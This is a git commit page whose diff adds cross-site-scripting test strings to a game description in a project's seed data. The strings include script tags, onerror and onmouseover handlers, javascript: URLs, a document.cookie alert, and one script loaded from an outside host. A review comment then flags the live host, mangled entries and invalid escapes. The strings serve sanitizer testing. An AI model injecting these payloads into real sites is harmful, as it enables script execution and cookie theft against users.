authorrubenwardy <rw@rubenwardy.com>2020-01-22 23:45:40 +0000
committerrubenwardy <rw@rubenwardy.com>2020-01-22 23:45:40 +0000
commit5e60cb83de861a46ed18a27a62b6720f3dd341f0 (patch)
tree616584b1b12571cadcee838d15a67c27e017c769
parent595d6ea3b6d663080448085cc2b0c9473388bc37 (diff)
downloadcheatdb-5e60cb83de861a46ed18a27a62b6720f3dd341f0.tar.xz
Add XSS strings to test datav1.22.1
-rw-r--r--app/default_data.py32
1 files changed, 32 insertions, 0 deletions
diff --git a/app/default_data.py b/app/default_data.py
index 85f42b3..eb8aec6 100644
--- a/app/default_data.py
+++ b/app/default_data.py
@@ -304,6 +304,38 @@ No warranty is provided, express or implied, for any part of the project.
game1.desc = """
As seen on the Capture the Flag server (minetest.rubenwardy.com:30000)
+` `[`javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/`](javascript:/*--%3E%3C/title%3E%3C/style%3E%3C/textarea%3E%3C/script%3E%3C/xmp%3E%3Csvg/onload='+/%22/+/onmouseover=1/+/)`[*/[]/+alert(1)//'>`
+
+<IMG SRC="javascript:alert('XSS');">
+
+<IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)>
+
+``<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>``
+
+\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
+
+\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
+
+<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+
+<script>alert("hello");</script>
+
+<SCRIPT SRC=`[`http://xss.rocks/xss.js></SCRIPT>`](http://xss.rocks/xss.js%3E%3C/SCRIPT%3E)`;`
+
+`<IMG \"\"\">`
+
+<SCRIPT>
+
+alert("XSS")
+
+</SCRIPT>
+
+<IMG SRC= onmouseover="alert('xxs')">
+
+<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
+
+"\>
+
Uses the CTF PvP Engine.
"""
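Review bot: The seeded entry containing `http://xss.rocks/xss.js` points at a live third-party host, so if the description sanitizer ever regresses, any instance populated from this default data would fetch and run a script the project does not control. A reserved name such as `http://xss.invalid/xss.js` (constructed placeholder) exercises the same path without that dependency. Several entries also look as if they passed through a Markdown converter before being pasted (backtick wrapping, `[...](...)` links, `&amp;quot;`, `\<a ...\>`), so they may not exercise the raw vectors that were intended. The `\<` and `\>` sequences in the two `xxs link` lines and in the final `"\>` are invalid escapes in this non-raw `"""` literal and will produce warnings on newer Python versions; dropping the backslashes or writing `\\<` avoids that. Because this is only seed data, a unit test asserting that the rendered description contains no `<script`, no `on*=` attributes and no `javascript:` URLs would make the check automatic instead of relying on someone viewing the page.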